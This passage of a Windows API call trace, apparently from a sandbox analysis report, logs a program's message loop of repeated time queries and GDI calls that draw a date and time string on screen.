wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x199)) [0104.668] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x199)) [0104.668] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.689] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.689] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.689] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1ae)) [0104.689] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1ae)) [0104.689] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.698] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.698] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.698] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1b7)) [0104.698] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1b7)) [0104.698] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.722] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.722] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.722] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1cf)) [0104.722] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1cf)) [0104.722] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.733] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.733] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.733] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1da)) [0104.733] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1da)) [0104.733] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.749] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.749] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.749] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1ea)) [0104.749] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1ea)) [0104.749] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.760] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.760] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.760] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1f5)) [0104.760] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1f5)) [0104.761] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.781] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.781] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.781] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x20a)) [0104.781] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x20a)) [0104.781] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.792] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.792] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.792] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x215)) [0104.792] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x215)) [0104.792] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.813] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.813] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.813] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x22a)) [0104.813] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x22a)) [0104.813] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.823] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.823] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.823] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x234)) [0104.823] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x234)) [0104.823] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.844] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.844] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.844] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x249)) [0104.844] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x249)) [0104.844] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.903] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.903] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.903] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x284)) [0104.903] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x284)) [0104.903] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.908] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.908] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.908] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x289)) [0104.908] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x289)) [0104.908] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.918] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.918] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.919] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x294)) [0104.919] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x294)) [0104.919] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.939] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.939] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.939] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2a8)) [0104.939] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2a8)) [0104.939] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.951] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.951] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.951] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2b4)) [0104.951] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2b4)) [0104.951] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.972] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.972] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.972] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2c9)) [0104.972] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2c9)) [0104.972] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.983] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.983] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.983] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2d4)) [0104.983] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2d4)) [0104.984] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.004] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.004] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.004] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2e9)) [0105.004] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2e9)) [0105.004] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.013] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.013] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.013] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2f2)) [0105.013] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x2f2)) [0105.013] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.028] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.028] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.028] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x301)) [0105.028] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x301)) [0105.028] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.079] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.079] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.079] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x334)) [0105.079] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x334)) [0105.079] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.094] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.094] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.094] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x343)) [0105.094] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x343)) [0105.094] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.104] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.104] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.104] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x34d)) [0105.104] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x34d)) [0105.104] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.132] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.132] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.132] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x369)) [0105.132] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x369)) [0105.132] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.143] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.143] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.144] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x375)) [0105.144] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x375)) [0105.144] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.154] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.154] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.154] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x37f)) [0105.154] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x37f)) [0105.154] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.175] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.175] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.175] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x394)) [0105.175] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x394)) [0105.175] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.185] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.185] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.185] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x39e)) [0105.185] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x39e)) [0105.185] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.200] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.200] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.200] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3ad)) [0105.200] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3ad)) [0105.200] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.225] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.225] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.225] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3c6)) [0105.225] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3c6)) [0105.225] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.229] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.229] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.229] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3ca)) [0105.229] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3ca)) [0105.229] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.251] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.251] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.251] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3e0)) [0105.251] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x22, wMilliseconds=0x3e0)) [0105.251] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.261] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.261] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.261] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2)) [0105.261] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x2)) [0105.261] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0105.262] GetDC (hWnd=0x0) returned 0xa0100d0 [0105.262] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0105.262] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0105.262] GetSysColor (nIndex=8) returned 0x0 [0105.262] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0105.262] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0105.262] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0105.262] UnrealizeObject (h=0x2d10099f) returned 1 [0105.262] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0105.262] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0105.262] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0105.262] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:35 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:35 PM", lprc=0x19f5bd) returned 13 [0105.263] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0105.263] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0105.264] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0105.264] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0105.264] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0105.264] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 